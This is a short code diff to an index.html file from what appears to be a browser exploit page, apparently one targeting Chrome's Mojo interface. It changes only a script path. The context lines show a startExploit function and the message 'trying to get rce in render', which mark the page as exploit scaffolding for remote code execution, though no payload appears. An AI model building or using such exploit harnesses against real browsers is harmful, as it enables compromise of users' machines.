--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
 
         if (this.Mojo === undefined) {
             //var blobURL = URL.createObjectURL(new Blob(['(', getConfuseObject.toString(), ')()'], { type: 'application/javascript' }));
-            var url = "./a.js";
+            var url = "a.js";
             function startExploit() {
                 document.close();   
                 document.write("<h1>trying to get rce in render</h1>");
